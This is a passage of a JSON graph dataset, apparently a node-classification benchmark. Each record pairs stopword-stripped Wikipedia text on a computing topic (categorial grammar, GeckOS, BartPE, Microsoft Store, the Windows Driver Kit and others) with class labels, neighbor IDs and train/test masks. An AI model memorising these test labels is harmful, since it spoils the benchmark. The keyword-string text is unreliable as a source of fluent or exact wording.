    "text": "Categorial_grammar:categorial grammar categorial grammar term used family formalisms natural language syntax motivated principle compositionality organized according view syntactic constituents generally combine functions according function-argument relationship versions categorial grammar analyze sentence structure terms constituencies opposed dependencies therefore phrase structure grammars opposed dependency grammars categorial grammar consists two parts lexicon assigns set types also called categories basic symbol type inference rules determine type string symbols follows types constituent symbols advantage type inference rules fixed specification particular language grammar entirely determined lexicon categorial grammar shares features simply typed lambda calculus whereas lambda calculus one function type formula_1 categorial grammar typically two function types one type applied left one right example simple categorial grammar might two function types formula_2 formula_3 first formula_2 type phrase results phrase type formula_5 followed right phrase type formula_6 second formula_7 type phrase results phrase type formula_5 preceded left phrase type formula_6 notation based upon algebra fraction multiplied i.e concatenated denominator yields numerator concatenation commutative makes difference whether denominator occurs left right concatenation must side denominator cancel first simplest kind categorial grammar called basic categorial grammar sometimes ab-grammar ajdukiewicz bar-hillel given set primitive types formula_10 let formula_11 set types constructed primitive types basic case least set formula_12 formula_13 formula_14 think purely formal expressions freely generated primitive types semantics added later authors assume fixed infinite set primitive types used grammars making primitive types part grammar whole construction kept finite basic categorial grammar tuple formula_15 formula_16 finite set symbols formula_10 finite set primitive types formula_18 relation formula_19 lexicon relates types symbols formula_20 since lexicon finite specified listing set pairs like formula_21 grammar english might three basic types formula_22 assigning count nouns type formula_23 complete noun phrases type formula_24 sentences type formula_25 adjective could type formula_26 followed noun whole phrase noun similarly determiner type formula_27 forms complete noun phrase followed noun intransitive verbs type formula_28 transitive verbs type formula_29 string words sentence overall type formula_25 example take string bad boy made mess determiners boy mess nouns bad adjective made transitive verb lexicon formula_32 formula_33 formula_34 formula_35 formula_36 sequence types string formula_37 find functions appropriate arguments reduce according two inference rules formula_38 formula_39 formula_40 br formula_41 br formula_42 br formula_43 br formula_44 br formula_45 fact result formula_25 means string sentence sequence reductions shows must parsed bad boy made mess categorial grammars form function application rules equivalent generative capacity context-free grammars thus often considered inadequate theories natural language syntax unlike cfgs categorial grammars lexicalized meaning small number mostly language-independent rules employed syntactic phenomena derive lexical entries specific words another appealing aspect categorial grammars often easy assign compositional semantics first assigning interpretation types basic categories associating derived categories appropriate function types interpretation constituent simply value function argument modifications handle intensionality quantification approach used cover wide variety semantic phenomena lambek grammar elaboration idea concatenation operator types several inference rules mati pentus shown still generative capacity context-free grammars lambek calculus type concatenation operator formula_47 formula_12 formula_13 formula_50 lambek calculus consists several deduction rules specify type inclusion assertions derived following rules upper case roman letters stand types upper case greek letters stand sequences types sequent form formula_51 read string type formula_52 consists concatenation strings types formula_53 type interpreted set strings formula_54 may interpreted formula_55 includes subset horizontal line means inclusion line implies one line process begun axiom rule antecedents says type includes math axiom \\quad",
    "neighbors": [
      8297,
      2316,
      4070,
      6662
    ],
    "mask": "Test"
  },
  {
    "node_id": 10891,
    "label": 2,
    "text": "GeckOS:geckos geckos discontinued experimental operating system mos 6502 compatible processors system offers unix-like functionality including preemptive multitasking multithreading semaphores signals binary relocation tcp/ip networking via slip 6502 standard library geckos includes native support commodore pet 32 kb 96 kb models commodore 64 cs/a65 homebrew system due platform independent nature kernel code geckos advertised extremely easy os port alternative 6502 platforms binary compatibility lunix operating system attained lib6502 shared library used due lack mmu small fixed-location stack 6502 multitasking somewhat limited os supports maximum four tasks shared stack space used increased sixteen tasks stack snapshotting enabled although done expense system speed",
    "neighbors": [
      1922,
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      5397,
      9366,
      11539,
      6296,
      25,
      10776,
      11667,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      5036,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      7281,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 10892,
    "label": 4,
    "text": "David_Lowman:david lowman david daniel lowman former national security agency employee expert witness case overturned hirabayashi v. united states author posthumously published book magic untold story u.s. intelligence evacuation japanese residents west coast world war ii lowman career officer national security agency 1970s lowman worked declassification world war ii japanese cable traffic decrypted magic program based reading cables criticized commission wartime relocation internment civilians conclusion military necessity relocating japanese-americans internment camps 1985 court case brought gordon hirabayashi clear wartime conviction refusing report relocation lowman testified united states government intercepted decrypted signal traffic japan directing officials united states organize spy networks using japanese-americans agents court decided favor hirabayashi lowman died april 1999 lowman book magic untold story u.s. intelligence evacuation japanese residents west coast world war ii published posthumously 2001 magic argued internment japanese americans justified based intercepted communications indicated spy network operating american west coast book published lee allen retired army lieutenant colonel activist convinced smithsonian institution revise downward estimates medals honors awarded japanese-american soldiers world war ii allen also wrote book foreword claimed japanese-americans world war ii evacuation life government care provided much needed relief trials threats faced west coast magic particularly criticized civil liberties act 1988 offered reparations surviving japanese-american internees writing military review richard milligan concluded magic refutes accepted history evacuation solely result national leaders 'racism war hysteria lack political publishers weekly agreed book discussion decrypted japanese communications makes solid case intelligence community faith credibility contributed significantly government decision also noted book actually refute claims racism digressing instead technical details bitter critique 1988 decision compensate former prisoners jonathan kirsch los angeles times praised book intellectually honest enough allow us come conclusions particularly inclusion rebuttal general counsel commission wartime relocation internment civilians also suggested possible read magic intercepts come away entirely different impression evidence",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 10893,
    "label": 7,
    "text": "RightScale:rightscale rightscale company sells software service cloud computing management multiple providers company based santa barbara california thorsten von eicken former professor computer science cornell university left manage systems architecture expertcity startup company became citrix online joined rightscale ceo michael crandell rightscale vice president engineering rafael saavedra rightscale received 4.5 million venture capital april 2008 13 million december 2008 25 million september 2010 july 18 2012 rightscale announced acquisition scotland-based planforcloud.com formerly shopforcloud.com provides free cloud cost forecasting service rightscale introduced cloud maturity model release second annual state cloud report april 25 2013 report findings based rightscale survey 625 decision makers categorized according cloud maturity model analysis segmentation companies based varying degrees cloud adoption company raised 15.6 million february 2013 september 26 2018 flexera software acquired rightscale undisclosed amount november 5 2012 rightscale announced expanding existing relationship cloud hosting provider rackspace integrate openstack february 2013 rightscale became first cloud management company resell google compute engine public cloud services april 15 2013 rightscale announced would provide enterprise support windows azure conjunction microsoft announcement general availability release windows azure infrastructure services",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      8571,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 10894,
    "label": 4,
    "text": "Capture_the_flag:capture flag capture flag ctf traditional outdoor game two teams flag marker objective capture team flag located team base bring safely back base enemy players tagged players home territory depending rules may game become members opposite team sent back territory frozen place jail freed member team capture flag requires playing field sort indoor outdoor versions field divided two clearly designated halves known territories players form two teams one territory side flag often piece fabric object small enough easily carried person night time games might use flashlights glowsticks lanterns flags sometimes teams wear dark colors night make difficult opponents see one team opposing team flag territory may tagged opposing team flag objective game players venture opposing team territory grab flag return territory without tagged flag defended mainly tagging opposing players attempt take within territory players safe meaning tagged opposing players cross opposing team territory vulnerable flag usually placed visibly obvious location rear team territory difficult version flag hidden place seen one angle also might challenge involved example flag could hidden leaves tall tree players see flag knock bring base different versions capture flag different rules handling flag happens tagged players player tagged may eliminated game entirely game forced join opposing team sent back territory placed jail without guard according number people team jail predesignated area group territory exists holding tagged players normally towards back group territory tagged players may confined jail limited predetermined time common form game involves option jailbreak version players tagged remain jail indefinitely however players team may free jail means jailbreak jailbreaks accomplished player running territory enemy jail action may depending rules free jailed players simply physically touched one performing jailbreak variants teammates got tagged jailed 3 times kicked game next round general freed players obligated return directly territory attempting offensive action i.e. attempting grab flag return side freed players usually acquire free walk-backs safe tagging reach home territory player performing jail break hand neither safe restricted performing actions attempting grab flag generally moving enemy territory sometimes players jail form chains teammate tags one person chain everyone free simply leaving jail without freed considered poor sportsmanship severely frowned upon often leading expulsion game players one team jailed meaning teammate free jail team time want find team flag rules handling flag also vary game game deal mostly disposition flag failed attempt capturing one variant player tagged carrying flag returned original place another variant flag left location player tagged latter variant makes offensive play easier flag tend course game moved closer dividing line territories games possible players throw flag teammates long flag stays play without hitting ground allowed players pass flag captured one player 're safe tagged unless trip sometimes flag holder may safe even home territory obtain flags thus ending game option return side hand teammate carry side versions may throw flag hand running game player returns territory enemy flag teams flags also general rule flag carrier may attempt free teammates jail alterations may include one flag ctf defensive team offensive team games three flags case latter one win flags captured one another variation players put bandannas pockets six inches sticking instead tagging opponents must pull opponent bandanna pocket matter player bandanna pulled 're captured must depending preferences players go jail return base returning play version team territory small base team flag kept win one team must flags base urban settings game played indoors enclosed area walls similar walls hockey rink also spot sticking back opposing ends connected playing area flag placed urban variation legal checking hockey style legal checking boards allowed player commits foul illegal check placed penalty box specified amount time depending severity foul player deliberately injures opponent expelled rest game throwing flag allowed variation long flag caught hits ground flag thrown teammate hits ground caught flag placed spot throw player throws flag blocked intercepted player opposing team flag placed back base uncommon airsoft paintball nerf water warriors play ctf typically territories versions players hit must sit predetermined amount time returning play respawning 2014 kickstarter users fully funded campaign starlux games capture flag redux update would allow played night dark campaign raised 7,000 100 backers new game uses glowing orbs flags led bracelets identify teams light-up markers show boundaries jails kit comes 2 glowing orbs 8 jail markers 7 territory lights 16 led glow bracelets eight team 12 cards explain game variation one guidebook english spanish 2018 heavy.com featured game roundup 62 best games tweens toybuzz.org regularly includes game gift guides plasticandplush.com describes capture flag redux good example one successful kickstarter projects ’ widely available online retail aside software video games apps used urban capture flag first time classic game reimagined retail product stealing sticks similar game played british isles united states australia however instead flag number sticks items coats hats placed goal far end side playing field area capture flag players sent prison tagged opponents side may freed teammates player may take one opponents sticks time first team take opponents sticks side wins 1984 scholastic published bannercatch apple ii commodore computers edutainment game recognizable capture-the-flag mechanics bannercatch allows two humans alternating two characters game world play capture flag increasingly difficult team four ai bots bannercatch game world divided quadrants home enemy two no-mans land areas hold jails successful capture requires bringing enemy flag one team home quadrant players captured enemy territory no-mans land holding flag captured players must rescued designated jail one members team fallen flags remain dropped time-out period elapses flag returns one several starting locations home territory 2d map also features walls trees moving river enabling wide variety strategies special locations play area allow humans query game state flag status using binary messages 1992 richard carr released ms-dos based game called capture flag turn-based strategy game real time network modem play play-by-mail based around traditional outdoor game game required players merely move one characters onto square opponent flag opposed bringing back friendly territory difficulties implementing artificial intelligence computer player would needed bring enemy flag home intercept opposing characters carrying flag computer security capture flag ctf type wargame computer security competition ctf contests usually designed serve educational exercise give participants experience securing machine well conducting reacting sort attacks found real world i.e. bug bounty programs professional settings reverse-engineering network sniffing protocol analysis system administration programming cryptanalysis skills required prior ctf contests def con three main styles capture flag competitions attack/defense hardware challenges jeopardy attack/defense style competition team given machine small network defend isolated network teams scored success defending assigned machine success attacking team machines depending nature particular ctf game teams may either attempting take opponent flag machine teams may attempting plant flag opponent machine two prominent attack/defense ctf held every year def con largest hacker conference nyu-csaw cyber security awareness week largest student cyber-security contest hardware challenges usually involve getting unknown piece hardware figure bypass part security e.g using debugging ports using side-channel attack jeopardy -style competitions usually involve multiple categories problems contains variety questions different point values difficulties teams attempt earn points competition time frame example 24 hours directly attack rather race style game play encourages taking time approach challenges prioritizes quantity correct submissions timing fourth type ctf commonly referred king hill koth king hill similar attack/defend instead everyone machine small network defend preconfigured ones require teams exploit team successfully taken machine focus shifts defending machine teams attacks score usually determined score reporting service machine reports team token one team able gain access remove teams token insert thus making king hill capture flag among games made recent comeback among adults part urban gaming trend includes games like pac-manhattan fugitive manhunt game played city streets players use cellphones communicate news games spreads virally use blogs mailing lists urban capture flag played cities throughout north america one long running example occurs northrop mall university minnesota fridays typical attendance ranging 50 several hundred",
    "neighbors": [
      1121,
      3234,
      7491,
      4389,
      711,
      6473,
      9034,
      9166,
      2262,
      7449,
      4445,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10895,
    "label": 3,
    "text": "Alien_Syndrome:alien syndrome two players control two soldiers named ricky mary fight way large eight-way scrolling levels rescuing comrades held aliens rescued certain number hostages exit opens pass order fight end-of-level guardian monstrosity defeated able move onto next stage alien syndrome features two player simultaneous gameplay pickups assist player including better weapons maps current level 1988 game ported master system msx amiga atari st amstrad cpc commodore 64 famicom/nintendo entertainment system published tengen without nintendo license later game ported zx spectrum 1989 game gear 1992 sharp x68000 1992 latter arcade perfect port original arcade version game reviewed july 1987 issue computer video games clare edgeley described one gripping games played months praising aliens like horror atmosphere chilling sounds special effects graphics gameplay stated first time atmosphere sheer addictiveness shoot 'em transported another planet concluded fantastic master system version game reviewed 1989 dragon getting 2 5 stars game also converted polygonal graphics ps2 part sega ages re-release program included us version sega classics collection removed european version receive lower age certificate version updated controls adding use analog sticks similar seen sheriff smash tv original arcade game also included unlockable sonic ultimate genesis collection sequel name alien syndrome released wii psp july 24 2007",
    "neighbors": [
      1776,
      10316,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10896,
    "label": 2,
    "text": "BartPE:bartpe bartpe bart preinstalled environment discontinued tool customizes windows xp windows server 2003 lightweight environment similar windows preinstallation environment could run live cd live usb drive bartpe system image created using pe builder freeware program created bart lagerweij requires legal copy windows xp windows server 2003 additional applications included image using plugins often resides live cd usb drive bartpe allows user boot windows even hardware software fault disabled installed operating system internal hard drive – instance recover files also used scan remove rootkits computer viruses spyware infected boot files reset lost administrator password pe builder also known bart pe builder software used create bartpe system images windows preinstallation environment bartpe operates loading system registry files ram writing registry changes back boot media thus operating systems require hard drive network access also allows run non-writable media cd-rom since instance bartpe new installation bartpe boot disk needs original windows setup files order operate bart pe builder application interprets condenses files windows setup cd create bartpe installation build windows xp pro home edition cd preinstalled windows xp version without cd additional applications included bartpe setup use plugins plugin contains setup information specific application included media installed along windows bartpe boot currently hundred plugins available addition dozen-odd included default bartpe since bartpe represents totally independent operating environment obvious application examples involve backup restoration diagnosis error-correction systems malfunctioning primary storage drives plugin programs nominally added capacity bartpe media bartpe known certain incompatibilities windows xp cds shipped dell pcs dell versions include changes windows setup files cause bartpe build process fail two patches currently available correct known problems one replace setupreg.hiv load standard iastor.sys bartpe create windows vista windows 7 live dvds",
    "neighbors": [
      8576,
      641,
      5380,
      3463,
      651,
      6797,
      8080,
      3857,
      8976,
      11283,
      2196,
      10392,
      4505,
      6297,
      4637,
      7840,
      9377,
      4515,
      11301,
      3496,
      6697,
      1581,
      3250,
      9910,
      7739,
      6462,
      7615,
      9791,
      321,
      7106,
      582,
      1098,
      10957,
      9173,
      11605,
      2391,
      4316,
      8798,
      11103,
      5600,
      5985,
      10338,
      6371,
      8296,
      5225,
      4074,
      8299,
      8315,
      10989,
      5103,
      6265,
      2811,
      636,
      1150,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10897,
    "label": 5,
    "text": "Weave_(protocol):weave protocol weave network application layer protocol implementation comprehensive toolkit building connected internet things-class applications primary current focus consumer residential applications weave works across multiple ipv6-bearing link technologies ethernet wi-fi cellular thread adaptations bluetooth low energy point-to-point wireless links weave originally created nest labs launched nest protect 1st generation product 2013 since adopted continued google following google acquisition nest labs 2014 second wave architectural revisions made weave support nest secure security system nest connect nest x yale lock since acquisition nest labs google planned integrate weave android things embedded operating system codenamed brillo order create end-to-end solution iot devices google released implementation weave open source project openweave github june 2017 apache 2.0 license",
    "neighbors": [
      11267,
      2117,
      7983,
      11221,
      823,
      4888,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 10898,
    "label": 4,
    "text": "SUPERAntiSpyware:superantispyware superantispyware software application detect remove spyware adware trojan horses rogue security software computer worms rootkits parasites potentially harmful software applications although detect various types malware superantispyware designed replace antivirus software superantispyware virus definitions updated several times week generally receive build update month company claims specifically designed compatible security applications kaspersky therefore used even applications incompatible anti-spyware products product available freeware personal use limited functions automatic update scheduling limited repairing functions 2011 superantispyware received dismal rating pc magazine complained real-time protection lowest detection rate lowest score malware removal test freeware commercial version received 4 5 star average user rating cnet download.com website 16 july 2011 superantispyware acquired support.com transaction structured acquisition assets cash purchase price 8.5 million employees including founder industry leader nick skrepetos joined acquirer",
    "neighbors": [
      9121,
      10756,
      4165,
      2213,
      1994,
      877,
      6797,
      7983,
      9791,
      10392,
      2041,
      7515,
      6431
    ],
    "mask": "Test"
  },
  {
    "node_id": 10899,
    "label": 1,
    "text": "Paradox_(database):paradox database paradox relational database management system currently published corel corporation originally released ms-dos ansa software updated borland bought company mid 1991 borland began process acquire ashton-tate competing dbase product line windows version planned release borland 1992 delayed january 1993 time microsoft access windows available paradox last updated 2008 paradox dos relational database management system originally written richard schwartz robert shostak released belmont california-based company ansa software 1985 new york times described among first emerging generation software making extensive use artificial intelligence techniques noted paradox could read competing ashton tate dbase files september 1987 borland purchased ansa software including paradox/dos 2.0 software notable classic versions 3.5 4.5 versions 3.5 evolutions 1.0 version 4.0 4.5 retooled borland c++ windowing toolkit used different extended memory access scheme paradox/dos successful dos-based database late 1980s early 1990s time dbase xbase clones foxpro clipper dominated market notable competitors clarion dataease dataflex features distinguished paradox/dos – copiously illustrated well laid explanations written common english paradox windows distinctly different product paradox dos produced different team programmers paradox windows applications programmed different programming language called objectpal although key features dos product qbe database engine ports keeping dos code major break compatibility pal objectpal shift gui design metaphor forms reports objectpal changes controversial forced since pal based keystroke recording actions equivalent windows object-based language based ideas hypercard used place keystroke recording forms reports designers used device independent scaling including ability work zoomed mode detailed layout mouse right-click used access forms reports properties inspired xerox alto smalltalk way almost universal windows programs objectpal like hypercard associated visual objects also revealed right click property inspection layout tools could pinned stay screen idea borrowed next fairly widely adopted windows approximately first year development object-oriented code written c aided macros turbo c++ available point remaining parts code written c++ product manager shipping version 1.0 joe duncan development qa team totaled 30 people paradox windows quattro pro windows closely related project started development using beta versions windows 3.0 spring 1990 paradox/windows ended delayed year beyond original plan shipping early 1993 reasons many entirely surprising major rewrite oo language new tools shifting gui paradigm essentially first version operating system still big problem company microsoft managed ship access couple months ahead paradox windows major marketing win microsoft 1990 borland also started work internal dbase clone dos windows written assembler planned ship 1992 early 1992 became clear ashton-tate difficulties developing windows versions products borland switched plans instead acquiring company anointing internal project official successor part ashton-tate acquisition interbase database decided paradox/w able work interbase well paradox engine led creation idapi engine based around interbase acquisition also shifted focus paradox historically competed dbase markets paradox/w originally designed improve competitive position developer-oriented market dbase acquired longer desirable emphasis shifted towards ease-of-use market however product could changed match emphasis occurred later releases late stage making product somewhat overly complex entry level market microsoft first desktop database program microsoft access good job addressing market got first debuted comdex november 1992 response borland acquisition ashton-tate microsoft acquired foxpro incorporated rushmore technology access jet engine significantly improve performance microsoft access offered many features easier end users developers implement including intuitive query interface using windows links fields rather paradox text tagging fields qbe access basic programming language similar pal objectpal access paradox significantly differed way presented results queries access showed records query completed without overhead creating output table paradox showed results records retrieved answer table created performance difference significant large datasets negatively impacted paradox/w taking cue borland low price quattro pro spreadsheet debut microsoft excel microsoft access debuted 99 price undercut traditional dbms prices paradox dos paradox windows dbase around 799 negatively impacted borland firm borland management team 85 market share desktop database market severely underestimated threat microsoft microsoft access still paradox/w sold well meanwhile borland going serious problems caused ashton-tate acquisition many product lines discontinued corporate reorganization consolidation painful even worse internal dbase project center acquisition rationale eventually cancelled technical reasons leaving borland collapse revenues serious need develop missing dbase windows hurry borland lost strength fight multiple marketing battles needed range products paradox minimally marketed developers since company decided would hold replacement dbase eventually came 1994 late company make matters worse dbase dos clone foxbase copied dbase closely windows version product developed without existing dbase windows model one dbase dos strengths multi-vendor support lost various windows xbase products borland visual dbase windows could n't run microsoft foxbase windows programs vice versa faced fragmented market need rewrite programs take advantage windows little incentive xbase users stay loyal product 'd used dos 1995 microsoft bundled access microsoft office professional suite word excel powerpoint effectively killed end-user desktop database market standalone products despite solid follow-on versions improvements usability entry-level users paradox faded market included sale borland products wordperfect turn resold wordperfect got financial products current time writing paradox windows wordperfect quattro pro windows owned corel sold part office suite dbase windows came late significant player windows market dbase programmers migrated microsoft foxbase similar database tool borland retained interbase/idapi server focused efforts delphi tools years gave influential small part data-oriented developer market corel acquired certain rights develop market paradox mid-1990s released corel paradox 8 1997 association computing machinery acm began putting information corel paradox version 8 1998 paradox also bundled professional version corel wordperfect office suite subsequent releases included office professional edition versions 9 10 11 12 x3 x4 x5 x6 x7 x8 x9 strong paradox user base mainly centered paradox community associated newsgroups although many fans objectpal programming language paradox/windows pal/dos scripts could easily migrated object event models completely different forcing developers using pal completely rewrite database applications",
    "neighbors": [
      6147,
      2692,
      4614,
      10389,
      5401,
      10919,
      10286,
      4680,
      8393,
      9166,
      9177,
      7771,
      736,
      6112,
      7523,
      3556,
      8301,
      2544,
      7806,
      10239
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10900,
    "label": 2,
    "text": "Microsoft_Store_(digital):microsoft store digital microsoft store formerly known windows store digital distribution platform owned microsoft started app store windows 8 windows server 2012 primary means distributing universal windows platform uwp apps windows 10 microsoft merged distribution platforms windows marketplace windows phone store xbox video xbox music eventually xbox store microsoft store making unified distribution point apps digital videos digital music console games e-books included 2019 content available free charge store 2015 669,000 apps available store categories containing largest number apps games entertainment books reference education majority app developers one app similar platforms mac app store google play microsoft store curated apps must certified compatibility content addition user-facing microsoft store client store also developer portal developers interact microsoft takes 30 sale price apps prior january 1 2015 cut reduced 20 developer profits reached 25,000 microsoft previously maintained similar digital distribution system software known windows marketplace allowed customers purchase software online marketplace tracked product keys licenses allowing users retrieve purchases switching computers windows marketplace discontinued november 2008 microsoft first announced digital distribution service windows presentation build developer conference september 13 2011 details announced conference revealed store would able hold listings certified traditional windows apps well called metro-style apps time tightly-sandboxed software based microsoft design guidelines constantly monitored quality compliance consumers windows store intended way obtain metro-style apps announced alongside developer preview release windows 8 windows store become available consumer preview released february 2012 updates apps published store july 1 2019 available windows 8 rtm users per microsoft lifecycle policies windows 8 unsupported since 2016 updated version windows store introduced windows 8.1 home page remodeled display apps focused categories popular recommended top free paid special offers expanded details ability apps automatically update also added windows 8.1 update also introduced notable presentation changes including increasing top app lists return 1000 apps instead 100 apps 'picks section changing default sorting reviews 'most popular updates apps published store july 1 2023 available windows 8.1 windows 10 released updated version windows store merged microsoft distribution platforms windows marketplace windows phone store xbox video xbox music unified store front windows 10 platforms offering apps games music film tv series themes ebooks september 2017 microsoft began re-brand windows store microsoft store new icon carrying microsoft logo xbox store merged new version platform web apps traditional desktop software packaged distribution windows store desktop software distributed windows store packaged using app-v system allow sandboxing february 2018 microsoft announced progressive web apps would begin available microsoft store microsoft would automatically add selected quality progressive web apps bing crawler allow developers submit progressive web apps microsoft store windows store available windows server 2012 installed default unavailable windows server 2016 however line-of-business uwp apps uwp apps acquired microsoft store business formerly windows store business installed sideloading microsoft store primary means distributing windows store apps users although sideloading apps outside store supported out-of-box sideloading support windows 8 available enterprise edition windows 8 running computers joined windows domain sideloading windows rt windows 8 pro windows 8 enterprise computers without domain affiliation requires purchase additional licenses volume licensing windows 10 removes requirement allowing users freely enable disable sideloading initially microsoft took 30 cut app sales reached us 25,000 revenue cut dropped 20 january 1 2015 reduction cut 25,000 removed microsoft takes 30 cut app purchases regardless overall sales third-party transactions also allowed microsoft take cut early 2019 microsoft lets app developers get 95 app revenues microsoft take 5 user download app direct url individual developers able register 19 usd companies 99 usd 2015 669,000 apps available store including apps windows nt windows phone uwp apps work platforms categories containing largest number apps games entertainment books reference education majority app developers one app free paid apps distributed microsoft store paid apps ranging cost us 0.99 999.99 developers 120 countries submit apps microsoft store apps may support 109 languages long support one 12 app certification languages april 2 2019 microsoft announced sale e-books microsoft store ceased due drm licenses renewed books become inaccessible july 2019 microsoft automatically refund users purchased books via service similar windows phone store microsoft store regulated microsoft applicants must obtain microsoft approval app becomes available store prohibited apps include following types app forbidden microsoft indicated remotely disable and/or remove apps users systems security legal reasons case paid apps refunds may issued done microsoft initially banned pegi 18 -rated content store europe however critics noted made content policies stricter intended pegi 18-rated games rated mature u.s. esrb system next lowest highest rating adults guidelines amended december 2012 remove discrepancy addition user facing microsoft store client store also developer portal developers interact windows developer portal following sections app microsoft store provides developer tools tracking apps store one track downloads financials crashes adoption ratings dashboard also presents detailed breakdown users market age region well charts number downloads purchases average time spent app dashboard also allows developer claim app name one year name returned available pool",
    "neighbors": [
      5125,
      6150,
      11270,
      10760,
      5643,
      4623,
      4624,
      3605,
      7701,
      8213,
      6680,
      537,
      540,
      9245,
      3102,
      10270,
      5666,
      5155,
      8227,
      8740,
      5670,
      9762,
      1577,
      7722,
      10281,
      5677,
      9262,
      7215,
      9263,
      2101,
      6709,
      8246,
      8757,
      2108,
      10812,
      3648,
      1089,
      4674,
      10817,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      3152,
      9808,
      4178,
      83,
      3667,
      6227,
      9812,
      10839,
      603,
      9819,
      608,
      4704,
      3170,
      10338,
      8296,
      617,
      8299,
      9324,
      622,
      9839,
      1138,
      4210,
      7796,
      2168,
      1656,
      5754,
      4731,
      6265,
      7290,
      7293,
      10879,
      10368,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      10902,
      11414,
      3224,
      4248,
      10394,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      4775,
      6827,
      6828,
      2221,
      7857,
      5300,
      9910,
      7351,
      5819,
      10428,
      2749,
      190,
      7359,
      4289,
      194,
      2244,
      8391,
      200,
      5320,
      9420,
      10957,
      4302,
      4816,
      2259,
      6361,
      9434,
      8413,
      2782,
      9442,
      740,
      741,
      4326,
      231,
      2279,
      2281,
      1770,
      3303,
      3308,
      3821,
      9448,
      10989,
      10991,
      10993,
      11498,
      6393,
      3834,
      1791,
      8959,
      11519,
      259,
      4356,
      11524,
      11525,
      7435,
      4836,
      7947,
      782,
      9487,
      3856,
      3857,
      8976,
      788,
      1813,
      5397,
      3351,
      11030,
      5401,
      8473,
      8985,
      8476,
      8988,
      11546,
      11549,
      4384,
      7456,
      7970,
      3875,
      9508,
      5413,
      11559,
      1832,
      3881,
      5928,
      6441,
      10024,
      10026,
      6446,
      7983,
      10029,
      1842,
      3890,
      1844,
      4405,
      9525,
      823,
      2872,
      10039,
      11060,
      315,
      6972,
      11572,
      6462,
      7486,
      3394,
      1347,
      1348,
      9033,
      2892,
      6476,
      3918,
      847,
      3922,
      11605,
      1366,
      4439,
      4951,
      5465,
      9564,
      11103,
      2401,
      2402,
      1379,
      7523,
      11570,
      2919,
      9063,
      4458,
      6506,
      4972,
      8554,
      3950,
      9066,
      10096,
      9585,
      9593,
      1916,
      2943,
      8068,
      3462,
      8582,
      1418,
      2955,
      5003,
      5004,
      1935,
      8080,
      7064,
      11677,
      929,
      11683,
      8103,
      4010,
      10157,
      430,
      6062,
      10673,
      6583,
      6584,
      9655,
      1978,
      10172,
      9151,
      960,
      7106,
      8132,
      8644,
      3527,
      6088,
      969,
      5578,
      5067,
      9671,
      5070,
      463,
      3535,
      4051,
      8659,
      11221,
      1498,
      2010,
      5594,
      478,
      8161,
      6114,
      6115,
      7140,
      6119,
      5096,
      8681,
      5612,
      6637,
      9709,
      6641,
      1522,
      3573,
      9205
    ],
    "mask": "Train"
  },
  {
    "node_id": 10901,
    "label": 7,
    "text": "Pilot_job:pilot job computer science pilot job type multilevel scheduling resource acquired application application schedule work resource directly rather going local job scheduler might lead queue waits work unit term comes condor high-throughput computing system condor glideins provides functionality examples pilot jobs bigjob implemented saga swift coasters part swift parallel scripting system falkon lightweight task execution framework htcaas pilot jobs often used systems queues part purpose sense avoid multiple waits queues often found parallel computing systems pilot jobs usually part distributed application many times associated many-task computing",
    "neighbors": [
      7018
    ],
    "mask": "Test"
  },
  {
    "node_id": 10902,
    "label": 2,
    "text": "Windows_Driver_Kit:windows driver kit windows driver kit wdk software toolset microsoft enables development device drivers microsoft windows platform includes documentation samples build environments tools driver developers complete toolset driver development also need following compiler visual studio windows sdk windows hlk previously wdk known windows driver development kit ddk supported windows driver model wdm development got current name microsoft released windows vista added following previously separated tools kit installable file system kit ifs kit driver test manager dtm though dtm later renamed removed wdk ddk windows 2000 earlier versions include compiler instead need install visual c++ separately compile drivers version windows xp ddk later wdk include command line compiler compile drivers one reasons microsoft gave including compiler quality drivers would improve compiled version compiler used compile windows visual c++ targeted application development different product cycle frequent changes wdk 8.x later series goes back require installing matched version visual studio separately time integration complete edit build debug driver within visual studio directly note windows nt ddk windows 98 ddk windows 2000 ddk longer made available download microsoft java-related settlements made microsoft sun microsystems",
    "neighbors": [
      6797,
      10900,
      11030,
      11414,
      3224,
      5401,
      7064,
      4384,
      8227,
      11683,
      11559,
      4010,
      10157,
      7983,
      9263,
      11570,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      10079,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      9205,
      5754,
      8445,
      2943
    ],
    "mask": "Train"
  },
  {
    "node_id": 10903,
    "label": 4,
